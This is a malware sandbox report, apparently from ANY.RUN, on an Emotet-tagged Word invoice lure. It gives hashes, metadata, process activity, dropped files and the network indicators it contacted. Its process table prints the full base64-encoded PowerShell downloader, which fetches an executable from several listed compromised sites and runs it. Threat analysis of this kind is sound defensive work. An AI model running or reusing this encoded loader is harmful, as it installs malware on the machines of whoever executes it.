analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

INVOICE_OW_34423.doc

Full analysis: https://app.any.run/tasks/09c58a4c-536b-4991-a049-f912899f4428
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: October 09, 2019, 14:21:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Investor, Subject: Practical Wooden Table, Author: Raymond Dibbert, Keywords: Functionality, Comments: Oman, Template: Normal.dotm, Last Saved By: Arianna Sawayn, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 22:22:00 2019, Last Saved Time/Date: Tue Oct 8 22:22:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 177, Security: 0
MD5:

E85CC63F770351B4A8ABC0465EE11223

SHA1:

B04290AC9A65425BB0278D604B7A3A4066278D15

SHA256:

98171CB786B90D72B9719F6A6FB80C5104FD3DD2AEEEEE5FFB386FA91091602E

SSDEEP:

6144:N57I3o9KUzSMnLx3EHBXyaBiG6EUqnUPse:N57I3oEUGMt3Eh7BiG6PXPs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2200)

    • Executed via WMI

      • powershell.exe (PID: 2200)

    • PowerShell script executed

      • powershell.exe (PID: 2200)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3312)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3312)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Simonis
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 206
Paragraphs: 1
Lines: 1
Company: Gleason, Gislason and Gibson
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 177
Words: 30
Pages: 1
ModifyDate: 2019:10:08 21:22:00
CreateDate: 2019:10:08 21:22:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Arianna Sawayn
Template: Normal.dotm
Comments: Oman
Keywords: Functionality
Author: Raymond Dibbert
Subject: Practical Wooden Table
Title: Investor
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3312"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\INVOICE_OW_34423.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2200powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADUANQAwADEANwA4ADAAMgAwADYAPQAnAGMAYwAwADAAMwAyADEAOAAyADUAOAAwAGMAJwA7ACQAYgA1AHgAMAA0ADAANAA3ADMAMgAyACAAPQAgACcAMgA4ADAAJwA7ACQAYgBjAGIANgA3ADQAMAB4ADQAMQAxADYAPQAnAGIANgBjADUAMAAxADAANAAwAHgAMwAnADsAJABjADQAMwBjADgAeAA0ADYAMQA1ADAAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGIANQB4ADAANAAwADQANwAzADIAMgArACcALgBlAHgAZQAnADsAJAB4ADAAMABiADIAYgBjADkAMAA0AGMAPQAnAHgAMAA2AGIAeAA5ADEAeAAwAGIAMAA4ACcAOwAkAGMAMAAwADkAMAAwADAAeAA2AGIAMwA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAQgBDAEwASQBlAG4AdAA7ACQAYgA1AGMANgA5ADAANwAwADEAMwAwADAANwA9ACcAaAB0AHQAcABzADoALwAvAHEAdQBhAG4AdAB1AG0AbgBlAHUAcgBvAGwAbwBnAHkALgBjAG8AbQAvAGMAOQB3AHAAdQBsAGgALwBqAHoAYgAyADgAaAA4AC0AbgBiADAAcgBuAHcANAA2AC0AMwAwADEANAA1ADQAOQAzADIANQAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AeAB1AHAAZQByAHcAZQBiAC4AYwBvAG0ALwBvAGcANgBwAGoALwBuAGUAawBJAGkAbABZAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBvAHAAZQBuAHcAYQB0AGUAcgBzAHcAaQBtAGwAaQAuAGMAbwBtAC8AcgBvAGEAdwBrAC8AOQBxAGoAeABqAHgAdwBlAGEALQBsAHIAdQBzAHcAeQB4AC0ANAA2ADUAMQA4ADMANQAyADEALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBlAHYAZQB4AHQAZQBuAHMAaQBvAG4AcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABnAHIAYQBkAGUALwByAHUAeQBqAGsAbwAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGQAaQBhAG0AbwBuAGQAZQBnAHkALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHcAdQBrAHMAZABnAHgAZwA5AG4ALQBwAGMAbQAtADYAOAA3ADAALwAnAC4AIgBTAHAAYABsAGkAVAAiACgAJwBAACcAKQA7ACQAYwAxADEAYgAxADEAYgAwAGMANgBjAD0AJwB4ADcAOQBiADAAYwA1AHgAMAAwADAAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAYgBjADAAYgA1ADAAMAAwADgAMAA2AGMAIABpAG4AIAAkAGIANQBjADYAOQAwADcAMAAxADMAMAAwADcAKQB7AHQAcgB5AHsAJABjADAAMAA5ADAAMAAwAHgANgBiADMALgAiAGQAYABvAFcAYABOAGAATABPAGEAZABGAEkAbABFACIAKAAkAGIAYwAwAGIANQAwADAAMAA4ADAANgBjACwAIAAkAGMANAAzAGMAOAB4ADQANgAxADUAMAApADsAJAB4AGIAMABiADQAeAAwADMANQA3ADMAPQAnAGIAMgA4AHgAMABjADEAMAA1ADEAeAAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAGMANAAzAGMAOAB4ADQANgAxADUAMAApAC4AIgBsAGAAZQBOAGcAVABoACIAIAAtAGcAZQAgADMANQA5ADEANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAFIAVAAiACgAJABjADQAMwBjADgAeAA0ADYAMQA1ADAAKQA7ACQAeAAwADQANABiADcAeAAwADAANAA0ADAAMAA9ACcAeABjADAAeABiAGIAOQAzADAAMAAwADQAMQAnADsAYgByAGUAYQBrADsAJABjADMAMAAxADUANgBiAGMAMQA0AHgANgA1AD0AJwB4ADEANgBiADMAeAAyADAANAA5ADYANQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB4AGMAMAB4ADAAOABiADAAOQAxADMAMAA9ACcAYgBiADYAMgBjADEAOQA4ADAAYwA1ADAAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 630
Read events
1 130
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
17

Dropped files

PID
Process
Filename
Type
3312WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRDFC.tmp.cvr
MD5:
SHA256:
2200powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CGOKFTSNW76A5PJI46NZ.temp
MD5:
SHA256:
3312WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E3BA32E.wmfwmf
MD5:D2EA8D23B13599A955476366EC421B69
SHA256:7E7B7C9913C6C3ADE74B9C32A3F56B4DFF89E7F8DA0827796B7025ED450B88B0
2200powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1024a1.TMPbinary
MD5:57F2BEBD8AB4D14DFF05F8F1EE1B1091
SHA256:24089794FD7207234A86BFD7344771ABD7A0BC15DCEB1A256EF927F010B65B1F
3312WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\INVOICE_OW_34423.doc.LNKlnk
MD5:232BFDA2DB3227D8B0AA1A3D8A496CD1
SHA256:B34533F447BC104CB6534D8A871C5543EE394C4EF5C845B3CAB99BB8F35CEDFA
3312WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1DC2B246.wmfwmf
MD5:089B7464DB93FC0E3C76863ABD6DADB4
SHA256:34A6743403F07ECC24EB89572990F6B375A83ADCB6D77F354CEB7D7BC5C75873
3312WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:B56536BF9E38169CBF220B8EEA0608B7
SHA256:3423826254E9F7B9A495350D51344AF77193F3FE173E5895832E05ECD7A88851
3312WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:2C233EA208BAE331A24427A029590B66
SHA256:B9C9C93F06413758D91FEDEB037902B112BBDD223812DEA6E81DC2E5870D1E87
3312WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E82CA76C.wmfwmf
MD5:2D0A3959940CDA264D880FDBAF145585
SHA256:75F604C7F17A8EC1EA7C747E41A254B96E1B0B26D7FF3887017AAEE68D8B9349
3312WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A55EBC5A.wmfwmf
MD5:9B7D75AFA166F59B75A03F23425D1AB0
SHA256:B930C6FFBFB0CFB5FDE8FE96E3B5B727C9C198CE3A4EDDD878C1261FE1DA7D08
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
7
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2200
powershell.exe
GET
45.56.100.50:80
http://www.evextensions.com/wp-content/upgrade/ruyjko/
US
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2200
powershell.exe
198.71.233.68:443
quantumneurology.com
GoDaddy.com, LLC
US
suspicious
2200
powershell.exe
107.180.2.5:443
www.openwaterswimli.com
GoDaddy.com, LLC
US
unknown
2200
powershell.exe
45.56.100.50:80
www.evextensions.com
Linode, LLC
US
unknown
2200
powershell.exe
107.180.41.41:443
www.xuperweb.com
GoDaddy.com, LLC
US
unknown

DNS requests

Domain
IP
Reputation
quantumneurology.com
  • 198.71.233.68
suspicious
www.xuperweb.com
  • 107.180.41.41
unknown
www.openwaterswimli.com
  • 107.180.2.5
unknown
www.evextensions.com
  • 45.56.100.50
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
INVOICE_OW_34423.doc